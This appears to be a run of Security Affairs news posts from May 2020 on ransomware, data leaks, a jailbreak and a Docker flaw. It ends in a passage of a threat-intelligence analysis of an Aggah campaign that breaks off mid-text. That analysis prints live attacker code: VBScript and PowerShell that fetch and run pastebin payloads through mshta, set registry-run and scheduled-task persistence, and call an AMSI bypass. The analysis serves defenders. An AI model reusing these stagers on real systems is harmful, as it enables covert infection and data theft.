This sample of Ragnar Locker terminates security programs and managed service providers (MSP) utilities to prevent them from blocking the attack.

“A new ransomware attack method takes defense evasion to a new level—deploying as a full virtual machine on each targeted device to hide the ransomware from view. In a recently detected attack, Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine.” reads the report published by Sophos. “The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.”

The attack chain starts with the creation of a tool folder that includes VirtualBox, a mini Windows XP virtual disk called micro.vdi, which is an image of a stripped-down version of the Windows XP SP3 OS (MicroXP v0.82). The image includes the 49 kB Ragnar Locker ransomware executable, the attack also includes several executables and scripts to prep the environment.

Ragnar Locker ransomware

The malware leverage a VirtualBox feature that allows the host operating system to share folders and drives as a network share inside a virtual machine.  The virtual machine mounts the shared path as a network drive from the \\VBOXSVR virtual computer to access their content.

“In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script.” continues the analysis. “The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.”

The install.bat batch file allows the threat to scan for local drives and mapped network drives on the host and builds a configuration file that automatically shares them with the virtual machine.

The script also prepares an sf.txt file containing VirtualBox configuration settings to automatically share all of the drives on the computer with the virtual machine.

The attackers launch the Windows XP virtual machine using the SharedFolder directives created by their batch file that are accessible within the virtual machine. and the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

When launched, all of these shared drives will now be accessible from within the virtual machine. Experts pointed you that the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

Windows XP virtual machine
Windows XP virtual machine
(Source: Sophos)

Also included is a vrun.bat file that is located in the Startup folder so that it is launched immediately when the virtual machine starts.

This vrun.bat file, shown below, will mount each shared drive, encrypt it, and then proceed to the next drive shared with the virtual machine.

Mounting all the shared drives to encrypt
Mounting all the shared drives to encrypt

As the security software running on the victim’s host will not detect the ransomware executable or activity on the virtual machine, it will happily keep running without detecting that the victim’s files are now being encrypted.

It should be noted that if the victim was running Windows 10’s Controlled Folder Access anti-ransomware feature, it may have been protected from an attack like this as the operating system would have detected writes to the protected folders.

When done, the victim will find a custom ransom note on their computer explaining how their company was breached, and their files were encrypted.

Custom Ragnar Locker ransom note
(Source: Sophos)

The use of a virtual machine to encrypting a device’s files without being detected is an innovative approach.

As VirtualBox and a Windows XP virtual machine are not considered malicious, most security software will not be concerned that it is blissfully writing to all the data on the computer.

This attack illustrates how security software with behavioral monitoring is becoming more important to stem the tide of ransomware infections.

Only by detecting the unusual mass file writes, would this attack be detected.

Pierluigi Paganini

(SecurityAffairs – Ragnar Locker ransomware, hacking)

The post Ragnar Ransomware encrypts files from virtual machines to evade detection appeared first on Security Affairs.

Maze ransomware operators leak credit card data from Costa Rica’s BCR bank

Maze ransomware operators published credit card details stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Maze ransomware operators have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Early May, Maze Ransomware operators claimed to have hacked the network of the state-owned Bank of Costa Rica Banco BCR and to have stolen internal data, including 11 million credit card credentials.

Banco BCR has equity of $806,606,710 and assets of $7,607,483,881, it is one of the most solid banks in Central America.

The hackers claim to have compromised the Banco BCR’s network in August 2019, and had the opportunity to exfiltrate its information before encrypting the files.

Maze Ransomware crew

According to Maze, the bank’s network remained unsecured at least since February 2020.

Anyway, the group explained that they did not encrypt the bank documents in February, because it “was at least incorrect during the world pandemic”.

The stolen data includes 4 million unique credit card records, and 140,000 allegedly belonging to USA citizens.

Now the Maze ransomware operators published a post on their leak site along with a spreadsheet (2GB in size) containing the payment card numbers from customers of Banco de Costa Rica (BCR).

MAze-BCR.jpg

The threat actors decided to leak the credit card number to lack of security measures implemented by the bank.

Security firm Cyble confirmed the data leak, over 2GB of data.

“Just like previously, the Cyble Research Team has verified the data leak, which consists of a 2GB CSV file containing details of various Mastercard and Visa credit cards or debit cards.” reads the post published by Cyble. “As per Cyble’s researchers, the Maze ransomware operators have made this data leak due to the Banco de Costa not taking the previous leaks seriously. Along with that, the Maze ransomware operators have threatened the BCR about this type of leak going to happen every week.”

Maze ransomware operators published screenshots showing unencrypted Visa or MasterCard credit card numbers, all the cards have been issued by BCR.

The BCR bank always denied that its systems have been hacked by the Maze gang.

“After multiple analyzes carried out by internal and external specialists in computer security, no evidence has been found to confirm that our systems have been violated. The permanent monitoring of our clients’ transactions confirms that none has been affected.” reads the last statement published by the bank.

Pierluigi Paganini

(SecurityAffairs – BCR, hacking)

The post Maze ransomware operators leak credit card data from Costa Rica’s BCR bank appeared first on Security Affairs.

3 hacking forums have been hacked and database have been leaked online

Three hacking forums Nulled.ch, Sinfulsite.com, and suxx.to have been hacked and their databases have been leaked online

Researchers from intelligence firm Cyble made the headlines again, this time they have discovered online the databases of three hacking forums. The three forums are Sinful SiteSUXX.TO and Nulled, they were all hacked.

These cybercrime forums are places of aggregations for hackers and cybercriminals, that could use them to participate in general discussion and sharing related resources.

hacking forums

Members of the forums share and sell data leaks, hacking tools, malware, tutorials, and much more. The databases appear to have been leaking in May 2020.

“Recently, the Cyble Research Team obtained the database leaks of these hacking forums which appear to have been leaking in May 2020. The Cyble’s researchers obtained-:

  • The databases of SUXX.TO and Nulled contains detailed information of their users, which appears to be dumped on 20 May 2020.
  • The full database of Sinful Site including the private messages, which appear to be dumped on 15 May 2020.

” reads the post published by security firm Cyble.

Cyble experts said that all the above databases have been indexed at AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – data breach, cyber crime forums)

The post 3 hacking forums have been hacked and database have been leaked online appeared first on Security Affairs.

25 million Mathway user records available for sale on the dark web

A threat actor is offering for sale on a dark web marketplace a database containing 25 million user records belonging to the Mathway.

A data breach broker, known as Shiny Hunters, is offering for sale on a dark web marketplace a database that contains 25 million user records for Mathway.

Early May, Shiny Hunters attempted to sell on a dark web marketplace databases containing more than 73.2 million user records from 11 different companies.

Shiny Hunters started offering the Tokopedia dump, then it began proposing 22 million user records for Unacademy and data allegedly obtained from the hack of the Microsoft’s GitHub account.

Recently the group has begun selling databases for the meal kit and food delivery company HomeChef, the photo print service ChatBooks, and Chronicle.com.

Mathway is a free math problem solver, from basic algebra to complex calculus, it instantly solves users’ math problems simply by typing their problem in (or point their camera and snap a pic!). Users will receive instant free answers through their website or mobile apps (both iOS and Android).

The Mathway app has over 10 million installs on Android Play Store and the Apple Store.

The dump was discovered by cyber intelligence firm Cyble, which confirmed that the archive was being sold in private sales in underground markets.

The Shiny Hunters group is offering for sale the Mathway database for $4,000.

Users’ records in the dump include email addresses and hashed passwords.

“We are aware of reports of a potential data compromise.  We are working with cybersecurity experts to investigate further, and will take the appropriate steps to ensure the security of customer information.” reads a statement published by Mathway.

Mathway is currently investigating the security breach, meantime its users should also change their password on the site and on any other site where they used the same credentials.

Mathway users could check if their account was impacted by the data breach by querying the Cyble’s AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – Mathway, hacking)

The post 25 million Mathway user records available for sale on the dark web appeared first on Security Affairs.

Unc0ver is the first jailbreak that works on all recent iOS versions since 2014

A team of hackers and cyber-security researchers have released a new jailbreak package dubbed Unc0ver for iOS devices.

A team of cyber-security researchers and hackers have released a new jailbreak package dubbed Unc0ver (from the name of the team that devised it) that works on all recent iOS versions.devices, even those running the current iOS 13.5 release.

Jailbreaking an iOS mobile device it is possible to remove hardware restrictions implemented by the Apple’s operating system, Jailbreaking gives users root access to the iOS file system and manager, this allows them to download and install applications and themes from third-party stores.

By default, Apple does not allow users to have full control over their iPhones and other iOS devices, citing security reasons.

The Unc0ver team today released Unc0ver 5.0.0, the latest version of their jailbreak, which can root and unlock all iOS devices, even those running the latest iOS v13.5.

The jailbreak exploits a zero-day vulnerability in the iOS operating system that was discovered by Pwn20wnd, a member of the Unc0ver team, and that has yet to be addressed by Apple.

Pwn20wnd states that #unc0ver v5.0.0 will be a big milestone for jailbreaking because it is the first zero-day jailbreak released since iOS 8 that was released in September 2014.

Other jailbreak applications released since iOS 9 used 1-day exploits and and did not work on the current iOS version.

The new Unc0ver 5.0.0 jailbreak can be used from iOS, macOS, Linux, and Windows devices.

The Unc0ver team published instructions on their website.

“unc0ver is designed to be stable and enable freedom from the moment you jail​break your device. Built-in runtime policy softener allows running code without Apple’s notarization and pervasive restrictions.” reads the website.

“unc0ver Team strongly cautions against installing any iOS software update that breaks unc0ver as you can’t re-jail​break on versions of iOS that are not supported by unc0ver at that time.”

The Unc0ver team tested the jailbreak on iOS 11 through iOS 13.5, the software did not work on iOS versions 12.3 to 12.3.2 and 12.4.2 to 12.4.5.

What makes this jailbreak outstanding is that according to Pwn20wnd it doesn’t impact Apple’s iOS security features.

Let’s see when Apple will release security updates to address the zero-day vulnerability exploited by the Unc0ver team.

Pierluigi Paganini

(SecurityAffairs – Unc0ver, jailbreak)

The post Unc0ver is the first jailbreak that works on all recent iOS versions since 2014 appeared first on Security Affairs.

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 17 – May 23, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 265

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Elexon, a middleman in the UK power grid network hit by cyber-attack
Experts reported the hack of several supercomputers across Europe
A bug in Edison Mail iOS app impacted over 6,400 users
FBI warns US organizations of ProLock ransomware decryptor not working
Mandrake, a high sophisticated Android spyware used in targeted attacks
Stored XSS in WP Product Review Lite plugin allows for automated takeovers
Texas Department of Transportation (TxDOT) hit by a ransomware attack
129 million records of Russian car owners available on the dark web
Australian product steel producer BlueScope hit by cyberattack
Bluetooth BIAS attack threatens billions of devices
Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways
Easyjet hacked: 9 million customers data exposed along with 2,200+ credit card details
Hackers Target Oil Producers During COVID-19 Slump
Adobe fixed several memory corruption issues in some of its products
Israel is suspected to be behind the cyberattack on Iranian port
Researchers disclose five Microsoft Windows zero-days
Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials
Three flaws in Nitro Pro PDF reader expose businesses to hack
VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director
Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia
Japan suspects HGV missile data leak in Mitsubishi security breach
Meal delivery service Home Chef discloses data breach
Santander, one of the biggest European banks, was leaking sensitive data on their website
Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware
Tens of thousands Israeli websites defaced
Cyber-Criminal espionage Operation insists on Italian Manufacturing
Experts found a Privilege escalation issue in Docker Desktop for Windows
Microsoft warns of massive campaign using COVID-19 themed emails
Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry
Experts observed a spike in COVID-19 related malspam emails containing GuLoader
Silent Night Zeus botnet available for sale in underground forums
The Florida Unemployment System suffered a data breach
Voter information for 2 millions of Indonesians leaked online

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 265 appeared first on Security Affairs.

Personal details and documents for millions of Indians available in the deep web

Researchers have discovered a dump containing 29.1M Indian jobseekers personal details that was offered for free in the hacking underground.

Researchers discovered a dump containing 29.1M Indian jobseekers personal details that was offered for free in the hacking underground.

An anonymous entity told Cyble researchers that the data were stored on an unprotected elastic search instance that is no longer accessible.

While Cyble was investigating the issue, a threat actor published more than 2,000 Indian Identity cards (Aadhaar cards) on one hacking forum, files appears to have originated from 2019.

Indian Identity card leak

Then the threat actor leaked 1.8M identity cards belonging to citizens of the Madhya Pradesh state on their forum.

“Cyble has indexed this information on their data breach monitoring and notification platform, Amibreached.com. People who are concerned about their information leakage, can ascertain the risks by registering to the platform.” reads the post published by Cyble.

Cyble researchers also discovered that a threat actor posted 2.3 GB (zipped) file on one of the hacking forums.

This time the leak contains a lot of personal details of millions of Indians Job seekers from different states. At the time of writing this article, the experts are still investigating the source of the leak.

“It appears to have originated from a resume aggregator given the sheer volume and detailed information.” state the experts.

“Cyble researchers have identified a sensitive data breach on the darkweb where an actor has leaked personal details of ~29 Million Indian Job Seekers from the various states. The original leak appears to be from a resume aggregator service collecting data from various known job portals. Cyble’s team is still investigating this further and will be updating their article as they bring more facts to the surface. This breach includes sensitive information such as email, phone, home address, qualification, work experience etc.”

Crooks could use personal information exposed in both data leaks to conduct various malicious activities, including identity thefts, scams, and corporate espionage.

Pierluigi Paganini

(SecurityAffairs – Indians data leaks, hacking)

The post Personal details and documents for millions of Indians available in the deep web appeared first on Security Affairs.

Online education site EduCBA discloses data breach and reset customers’ pwds

The online education portal EduCBA discloses a data breach and is resetting customers’ passwords in response to the incident.

Online education website EduCBA discloses a data breach, it has started notifying customers that in response to the incident it is resetting their passwords.

EduCBA is a leading global provider of skill based education with 500,000+ members across 40+ Countries. It offers 2500+ courses prepared by top-notch professionals from the Industry to help participants achieve their goals successfully. 

The company is notifying by email the incident to its customers confirming that their data have been accessed by an unauthorized party.

“Therefore, as a caution, we have invalidated passwords of all the users. You may retrieve your password here,” the data breach notification.

The data breach notification doesn’t include technical details about the attack, it only states that email, name, password, courses visited, etc may have been compromised.

The online education website states that no financial information was exposed as they use third-party processors such as PayPal and 2Checkout to process payments.

EduCBA data breach
Source BleepingComputer

As a precaution, EduCBA states that they have reset all user’s passwords.

As usual, customers that have used their EduCBA credentials at other sites have to change their passwords at these sites too.

Customers should remain vigilant of cyber attack, crooks may use their data to carry out spear-phishing attacks.

Pierluigi Paganini

(SecurityAffairs – EduCBA, hacking)

The post Online education site EduCBA discloses data breach and reset customers’ pwds appeared first on Security Affairs.

Voter information for 2 millions of Indonesians leaked online

A hacker has leaked the 2014 voter information for close to 2 million Indonesians on a well-known hacker forum and threatens to release 200 million.

A threat actor has published the 2014 voter information for close to 2 million Indonesians on a popular hacker forum and threatens to release data for a total of 200 million voters.

The dump includes voter records in individual PDF files that were allegedly stolen from the general election commission of Indonesia KPU.

According to intelligence firm Under the Breach, the PDFs were organized by Indonesia cities, threat actor leaks information on 2,300,000 Indonesian citizens. Leaked details include names, addresses, ID numbers, birth dates, and more, they appear to date back to 2013.

The KPU replied that the data was public information, it was available for anyone during the 2014 election. The KPU highlighted that its systems were not hacked.

Pierluigi Paganini

(SecurityAffairs – Indonesians, hacking)

The post Voter information for 2 millions of Indonesians leaked online appeared first on Security Affairs.

The Florida Unemployment System suffered a data breach

Officials revealed that the Florida Unemployment System suffered a data breach that impacted some residents who have made unemployment claims.

The Florida Department of Economic Opportunity revealed that the Florida Unemployment System suffered a data breach that impacted some residents who have made unemployment claims.

It has notified 98 people that have been impacted by the incident, government representatives didn’t disclose when the breach took place either the number of the affected individuals and the type of information compromised.

The agency spokeswoman Paige Landrum announced that the breach was addressed within one hour after the officials became aware of it. The Florida Department of Economic Opportunity is offering tho the impacted citizens identity protection services for free.

Impacted users should be vigilant and report any unauthorized activity on their financial accounts.

“The DEO has received more than 2 million claims seeking unemployment benefits from Floridians since the coronavirus pandemic caused mass business closings around the state, though only 1.6 million claims have been verified.” reported the AP agency. “Just under 1 million jobless workers in Florida have been paid more than $2.6 billion in benefits.”

State Sen. Linda Stewart, D-Orlando, expressed concern about the response of the agency to the security breach and the measures it has adopted to prevent future incidents. Stewart sent a letter to Department of Management Services Secretary Jonathan Satter, whose office oversees information technology for other state agencies.

“Given the agency’s (DEO) track record with processing unemployment applications, I’m sure you will understand the great concern I have that all remedies have been quickly taken and that Floridians can be assured that their personal information is now secured and will be protected from future attacks,” Stewart wrote.

The good is that the Florida Department of Economic Opportunity is not aware of malicious activity abusing exposed data.

Pierluigi Paganini

(SecurityAffairs – Florida, hacking)

The post The Florida Unemployment System suffered a data breach appeared first on Security Affairs.

Experts found a Privilege escalation issue in Docker Desktop for Windows

A severe privilege escalation vulnerability, tracked as CVE-2020-11492, has been addressed in the Windows Docker Desktop Service. 

Cybersecurity researchers from Pen Test Partners publicly disclosed a privilege escalation vulnerability in the Windows Docker Desktop Service. 

The CVE-2020-11492 issue affects the way the service uses named pipes when communicating as a client to child processes. 

“Docker Desktop for Windows suffers from a privilege escalation vulnerability to SYSTEM.  The core of the issue lies with the fact that the Docker Desktop Service, the primary Windows service for Docker, communicates as a client to child processes using named pipes.” reads the analysis published by Pen Test Partners.

“The high privilege Docker Desktop Service can be tricked into connecting to a named pipe that has been setup by a malicious lower privilege process.  Once the connection is made, the malicious process can then impersonate the Docker Desktop Service account (SYSTEM) and execute arbitrary system commands with the highest level privileges.”

Experts discovered that the Docker Desktop Service can be tricked by attackers into connecting to a named pipe that has been set up by a malicious lower privilege process. Then the process can impersonate the Docker Desktop Service account and execute arbitrary commands with the highest privileges.

Upon installing Docker Desktop for Windows, a service called Docker Desktop Service is installed and runs by default, waiting for the Docker Desktop application to start.

Once the Docker software is started it will create several child processes to manage several functions such as process monitoring and image creation. Windows OS uses pipes for inter-process communication (IPC).

Named pipes could allow the server side of the connection to impersonate the client account who is connecting.  The impersonation functionality allows the service to drop its credentials in favour of the connecting client.  Experts pointed out that when restricted operating system functionalities and files are requested, the action is performed under the impersonated account and not the service account that the process was launched under.

This specific right is dubbed “Impersonate a client after authentication,” and is assigned to specific accounts by default including admin, network service, IIS App Pool, and Microsoft SQL Server Account.

“By default, services that are started by the Service Control Manager have the built-in Service group added to their access tokens. Component Object Model (COM) servers that are started by the COM infrastructure and that are configured to run under a specific account also have the Service group added to their access tokens. As a result, these services get this user right when they are started.” continues the post.

“Anything started by the Service Control Manager will automatically get the impersonation privilege, no matter which account is used to start the service.

Experts discovered that an attacker that is able to execute code under the context of a process with the above privileges, could set up a malicious pipe to compromise the software and elevate their privileges to system-level. 

Experts pointed out that attackers need Administrator rights to create such a service.

“Let’s say you happen to be hosting a vulnerable IIS Web Application on the same machine as Docker for Windows,” continues the analysis.”This could be one example of a successful attack vector. The initial attack vector could utilize a vulnerability in the web application to perform code execution under the limited IIS App Pool account.”

The researchers sent the details to the Docker security team on March 25, that initially said impersonation is a Windows feature and reported the issue to Microsoft.

Experts provided a Proof-of-Concept (PoC) to Docker that finally acknowledged it on April 1. 

On May 11, Docker released version 2.3.0.2 that addresses the vulnerability.

“After a few emails back and forth, then finally submitting a working PoC, Docker did agree that it was a security vulnerability and as such have now issued a fix.  When the Docker service process connects to the named pipes of spawned child processes it now uses the SecurityIdentification impersonation level.  This will allow the server end of the pipe to get the identity and privileges of the client but not allow impersonation.” Pen Test Partners concludes.

Pierluigi Paganini

(SecurityAffairs – Windows, hacking)

The post Experts found a Privilege escalation issue in Docker Desktop for Windows appeared first on Security Affairs.

Cyber-Criminal espionage Operation insists on Italian Manufacturing

ZLab researchers spotted a new malicious espionage activity targeting Italian companies operating worldwide in the manufacturing sector.

Introduction

During our Cyber Threat Intelligence monitoring we spotted new malicious activities targeting some Italian companies operating worldwide in the manufacturing sector, some of them also part of the automotive production chain.

The group behind this activity is the same we identified in the past malicious operations described in Roma225 (12/2018), Hagga (08/2019), Mana (09/2019), YAKKA (01/2020). This actor was first spotted by PaloAlto’s UNIT42 in 2018 during wide scale operations against technology, retail, manufacturing, and local government industries in the US, Europe and Asia. They also stated the hypothesis of possible overlaps with the Gorgon  APT group, but no clear evidence confirmed that.

However, in order to keep track of all of our report, we synthesized all the monitored campaigns, with their TTPs and final payload:

Table 1: Synthetic table of the campaigns

As we can see from the table, the Aggah campaigns varied in the time, but it maintained some common points. All campaigns used as the initial stage an office document (PowerPoint or Excel) armed with macro and some of them used injection methods. 

All attack operations used a “Signed Binary Proxy Execution” technique abusing Mshta, a legit Microsoft tool, and used at least an executable file for the infection. In addition, the use of PowerShell stage or the abuse of legit web service has been reported in some campaigns. 

Furthermore the CMSTP bypass exploit is a new feature present only in the 2020, because the first malwares identified to exploit this vulnerability all date back to mid/end 2019, making think the fact that the Threat Actor likes to test the latest disclosed exploits in order to make its campaigns always at the forefront. Regarding persistence mechanisms, we note that initially scheduled tasks were used, but in the latest infections the registry run keys were used. All threats use at least one obfuscation method to make the analysis harder. 

Looking at the evolution of the final payloads, we can say that this evolution is certainly due to a chronological factor, since Revenge rat had become obsolete, but the evolution is also due to the technological factor and its means: revenge rat has the classic functionality of spyware, while AZORult is considered an info stealer. As a last payload, Agent Tesla was used which collects all the functionality of the previous payloads as it is considered an info stealer and spyware.

Technical Analysis

The infection chain starts with a malicious Microsoft Powerpoint weaponized with a malicious macro.

Hash7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3
ThreatMalicious macro
Brief DescriptionMalicious ppt dropper with macro.
Ssdeep192:EFm9QiR1zQRZ0DfZGJjBVySCGVBdJWUpFVzsn6xVNdwWFj/WOvYoZLlmYvJuec9r:i8R1ERZ0DMJjU+bRuxURKMxpcksPY

Table 2. Sample information

The content of the macro is quite easy to read and the content is short and easy to read:

Figure 1: Content of the malicious macro

The VBA macro is responsible to download and execute malicious code retrieved from pastebin.  j[.mp is an url shortening service, the following request redirect and download a pastebin content:

Figure 2: Shortener resolution

The MSHTA Drop Chain

Like the previous campaigns, this threat actor uses a Signed Binary Proxy Execution (ID: T1218) technique abusing “mshta.exe” (T1170) a signed and legit Microsoft tool. Adversaries can use mshta.exe to proxy execution of malicious .hta files, Javascript or VBScript.

Figure 3: Piece of code of the Bnv7ruYp paste

As shown in the above figure, the code is simply URI encoded by replacing each instance of certain characters by one, two or three escape sequences representing the UTF-8 encoding of the character. 

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>’id1CreateObject(“WScript.Shell”).Run “””mshta””””http:\\pastebin.com\raw\5CzmZ5NS”””
CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn “”Pornhubs”” /tr “”\””mshta\””http:\\pastebin.com\raw\5CzmZ5NS”” /F “,0
‘id2CreateObject(“WScript.Shell”).RegWrite StrReverse(“TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\sJEBiiMw”””, “REG_SZ”‘id3CreateObject(“WScript.Shell”).RegWrite StrReverse(“\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\YL0je2fU”””, “REG_SZ”

‘defidCreateObject(“WScript.Shell”).Run “””mshta””””http:\\pastebin.com\raw\UyFaSxgj”””CreateObject(“WScript.Shell”).RegWrite StrReverse(“FED\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\UyFaSxgj”””, “REG_SZ”

self.close</script>

Code Snippet 1

This stage acts as a dropper, in fact, it downloads and executes some pastebin contents through mshta.exe. 

Figure 4: Evidence of the NIBBI author

This lasta campaign has been dubbed with the name of the Pastebin user spreading the malicious pastes. This time the name is “NIBBI”. The first component is 5CzmZ5NS:

Figure 5: Piece of the code of 5CzmZ5NS paste

The second one is sJEBiiMw:

Figure 6: Piece of the code of the sJEBiiMw paste

The third one, YL0je2fU:

Figure 7: Piece of the code of the YL0je2fU paste

and the fourth component, UyFaSxgj:

Figure 8: Piece of the code of the UyFaSxgj paste

This obfuscation technique is typical of this particular actor and he largely leveraged it in many malicious operations. Moreover, the usage of a legit website such as pastebin (T1102) gives a significant amount of cover such as advantages of being very often whitelisted. Using such a service permits to reduce the C2 exposure. In the past, other groups also used similar techniques to decouple attack infrastructure information from their implant configuration, groups such as APT41, FIN6 or FIN7.

Once decoded the first component (5CzmZ5NS), it unveils some logic, as shown in Code Snippet 2. First of all, the script set a registry key, as a windows persistence mechanism (T1060) in which it place the execution of the following command: “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bin”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).iamresearcher)|IEX””””, 0 : window.close””)”, “REG_SZ”
CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\iamresearcher”, “$fucksecurityresearchers=’contactmeEX’.replace(‘contactme’,’I’);sal M $fucksecurityresearchers;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$iwannaleftsellingtools.open(‘GET’,’https://pastebin.com/raw/rnS6CUzX’,$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split ‘-‘ |ForEach-Object {[char][byte]””0x$_””};$asciiString= $asciiChars -join ”|M;[Byte[]]$Cli2= iex(iex(‘(&(GCM *W-O*)’+ ‘Net.’+’WebC’+’lient)’+’.Dow’+’nload’+’Str’+’ing(”https://pastebin.com/raw/Rk4engdU”).replace(”#”,”!#!@#”).replace(”!#!@#”,”0x”)’)) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS(‘InstallUtil.exe’,$Cli2)” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ((gp HKCU:\Software).iamresearcher)|IEX”, null, objConfig, intProcessID)’i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way’i am not a coder 😉 i watch you on twitter every day thanks 🙂 i love my code reports!’i am not a coder! bang 😉
self.close
</script>

Code Snippet 2

The code contains some “funny” comments related to the twitter community of security researchers which constantly monitor the actor operations. Then, the final payload is identified by Rk4engdU paste.

Figure 9: Piece of the rnS6CUz paste

Decoding this hex stream we get the following powershell code:

function UNpaC0k3333300001147555 {
[CmdletBinding()]    Param ([byte[]] $byteArray)  Process {     Write-Verbose “Get-DecompressedByteArray”        $input = New-Object System.IO.MemoryStream( , $byteArray )     $output = New-Object System.IO.MemoryStream            $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
    $puffpass = New-Object byte[](1024)    while($true){        $read = $01774000.Read($puffpass, 0, 1024)        if ($read -le 0){break}        $output.Write($puffpass, 0, $read)        }        [byte[]] $bout333 = $output.ToArray()        Write-Output $bout333    }}
$t0=’DEX’.replace(‘D’,’I’);sal g $t0;[Byte[]]$MNB=(‘OBFUSCATED PAYLOAD ONE‘.replace(‘@!’,’0x’))| g;
[Byte[]]$blindB=(‘OBFUSCATED PAYLOAD TWO‘.replace(‘@!’,’0x’))| g
[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
$blind=[System.Reflection.Assembly]::Load($deblindB)[Amsi]::Bypass()
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

Code Snippet 3 

The Powershell Loader

The Code Snippet 3 is a Powershell script in which the function “UNpaC0k3333300001147555” is declared, having the purpose to manipulate the two payloads in the right way. Both of them are .NET binaries. The de-obfuscated code is stored in the deblindB variable and then executed.

As suggested by the name deblindB, invoke the execution of the static method “Bypass” of the “Amsi” class.

Figure 10: Amsi Bypass exploit evidence

Instead, the payload embedded inside the variable $MNB is another type of injection tool, but this one is not executed by the script, probably because both the binaries perform the same action and only one is sufficient.

At this point, we deepen the “sJEBiiMw” component obtaining:

